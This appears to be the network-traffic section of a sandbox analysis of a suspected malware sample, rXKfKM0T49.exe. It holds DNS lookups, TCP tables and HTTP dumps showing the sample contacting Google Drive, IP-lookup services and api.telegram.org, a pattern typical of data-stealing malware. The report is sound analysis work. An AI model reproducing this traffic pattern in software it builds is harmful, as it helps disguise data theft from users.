                                                                                                          Jan 10, 2025 23:12:55.062952995 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.062998056 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.063003063 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.278768063 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.278881073 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.278925896 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.279334068 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.285514116 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.288007975 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.290591955 CET8050043132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.290663004 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.292889118 CET8050045132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.292963982 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.293111086 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.297944069 CET8050045132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.965363026 CET8050045132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.966485023 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.966535091 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.966603994 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.966882944 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.966900110 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.008415937 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.592690945 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.594420910 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.594449997 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.595352888 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.595360041 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.980452061 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.980664968 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.980915070 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.981231928 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.984549046 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.985822916 CET5004780192.168.2.9132.226.247.73
Jan 10, 2025 23:12:56.989628077 CET | 80 | 50045 | 132.226.247.73 | 192.168.2.9
Jan 10, 2025 23:12:56.989706039 CET | 50045 | 80 | 192.168.2.9 | 132.226.247.73
Jan 10, 2025 23:12:56.990609884 CET | 80 | 50047 | 132.226.247.73 | 192.168.2.9
Jan 10, 2025 23:12:56.990678072 CET | 50047 | 80 | 192.168.2.9 | 132.226.247.73
Jan 10, 2025 23:12:56.990768909 CET | 50047 | 80 | 192.168.2.9 | 132.226.247.73
Jan 10, 2025 23:12:56.995518923 CET | 80 | 50047 | 132.226.247.73 | 192.168.2.9
Jan 10, 2025 23:12:57.696752071 CET | 80 | 50047 | 132.226.247.73 | 192.168.2.9
Jan 10, 2025 23:12:57.742858887 CET | 50047 | 80 | 192.168.2.9 | 132.226.247.73
Jan 10, 2025 23:13:00.704706907 CET | 50048 | 443 | 192.168.2.9 | 149.154.167.220
Jan 10, 2025 23:13:00.704771042 CET | 443 | 50048 | 149.154.167.220 | 192.168.2.9
Jan 10, 2025 23:13:00.704937935 CET | 50048 | 443 | 192.168.2.9 | 149.154.167.220
Jan 10, 2025 23:13:00.705246925 CET | 50048 | 443 | 192.168.2.9 | 149.154.167.220
Jan 10, 2025 23:13:00.705270052 CET | 443 | 50048 | 149.154.167.220 | 192.168.2.9
Jan 10, 2025 23:13:01.338464022 CET | 443 | 50048 | 149.154.167.220 | 192.168.2.9
Jan 10, 2025 23:13:01.340259075 CET | 50048 | 443 | 192.168.2.9 | 149.154.167.220
Jan 10, 2025 23:13:01.340276003 CET | 443 | 50048 | 149.154.167.220 | 192.168.2.9
Jan 10, 2025 23:13:01.340342999 CET | 50048 | 443 | 192.168.2.9 | 149.154.167.220
Jan 10, 2025 23:13:01.340351105 CET | 443 | 50048 | 149.154.167.220 | 192.168.2.9
Jan 10, 2025 23:13:01.679380894 CET | 443 | 50048 | 149.154.167.220 | 192.168.2.9
Jan 10, 2025 23:13:01.679464102 CET | 443 | 50048 | 149.154.167.220 | 192.168.2.9
Jan 10, 2025 23:13:01.679619074 CET | 50048 | 443 | 192.168.2.9 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 23:11:46.504569054 CET | 54641 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 23:11:46.511576891 CET | 53 | 54641 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 23:11:47.580527067 CET | 62179 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 23:11:47.587179899 CET | 53 | 62179 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 23:11:51.673094988 CET | 62003 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 23:11:51.680149078 CET | 53 | 62003 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 23:11:53.078085899 CET | 51483 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 23:11:53.086281061 CET | 53 | 51483 | 1.1.1.1 | 192.168.2.9
Jan 10, 2025 23:11:59.357623100 CET | 60191 | 53 | 192.168.2.9 | 1.1.1.1
Jan 10, 2025 23:11:59.364669085 CET | 53 | 60191 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 23:11:46.504569054 CET | 192.168.2.9 | 1.1.1.1 | 0x1210 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:47.580527067 CET | 192.168.2.9 | 1.1.1.1 | 0x61d8 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:51.673094988 CET | 192.168.2.9 | 1.1.1.1 | 0xa6d2 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.078085899 CET | 192.168.2.9 | 1.1.1.1 | 0x902b | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:59.357623100 CET | 192.168.2.9 | 1.1.1.1 | 0x1d74 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 23:11:46.511576891 CET | 1.1.1.1 | 192.168.2.9 | 0x1210 | No error (0) | drive.google.com | | 216.58.206.46 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:47.587179899 CET | 1.1.1.1 | 192.168.2.9 | 0x61d8 | No error (0) | drive.usercontent.google.com | | 142.250.181.225 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:51.680149078 CET | 1.1.1.1 | 192.168.2.9 | 0xa6d2 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 23:11:51.680149078 CET | 1.1.1.1 | 192.168.2.9 | 0xa6d2 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:51.680149078 CET | 1.1.1.1 | 192.168.2.9 | 0xa6d2 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:51.680149078 CET | 1.1.1.1 | 192.168.2.9 | 0xa6d2 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:51.680149078 CET | 1.1.1.1 | 192.168.2.9 | 0xa6d2 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:51.680149078 CET | 1.1.1.1 | 192.168.2.9 | 0xa6d2 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.086281061 CET | 1.1.1.1 | 192.168.2.9 | 0x902b | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.086281061 CET | 1.1.1.1 | 192.168.2.9 | 0x902b | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.086281061 CET | 1.1.1.1 | 192.168.2.9 | 0x902b | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.086281061 CET | 1.1.1.1 | 192.168.2.9 | 0x902b | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.086281061 CET | 1.1.1.1 | 192.168.2.9 | 0x902b | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.086281061 CET | 1.1.1.1 | 192.168.2.9 | 0x902b | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:53.086281061 CET | 1.1.1.1 | 192.168.2.9 | 0x902b | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:11:59.364669085 CET | 1.1.1.1 | 192.168.2.9 | 0x1d74 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49975 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:11:51.689646006 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:11:52.399348974 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:11:52 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:11:52.404653072 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 10, 2025 23:11:52.623148918 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:11:52 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:11:59.138529062 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 10, 2025 23:11:59.353190899 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:11:59 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49978 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:00.514538050 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 10, 2025 23:12:01.186801910 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:01 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49980 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:02.053879976 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 10, 2025 23:12:02.727355957 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:02 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49982 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:03.600290060 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:04.286410093 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:04 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49984 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:05.274123907 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:05.984201908 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:05 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49986 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:06.816690922 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:07.507061958 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:07 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49988 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:08.403481007 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:09.103066921 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:08 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.9 | Source Port: 49990 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:10.002064943 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:10.675221920 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:10 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 8 | Source IP: 192.168.2.9 | Source Port: 49993 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:11.637964964 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:12.316365957 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:12 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 9 | Source IP: 192.168.2.9 | Source Port: 49995 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:13.293323040 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:13.975909948 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:13 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 10 | Source IP: 192.168.2.9 | Source Port: 49997 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:14.874728918 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:15.584177971 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:15 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 11 | Source IP: 192.168.2.9 | Source Port: 49999 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:17.141777039 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:17.826138973 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:17 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 12 | Source IP: 192.168.2.9 | Source Port: 50001 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:18.770514011 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:19.448154926 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:19 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
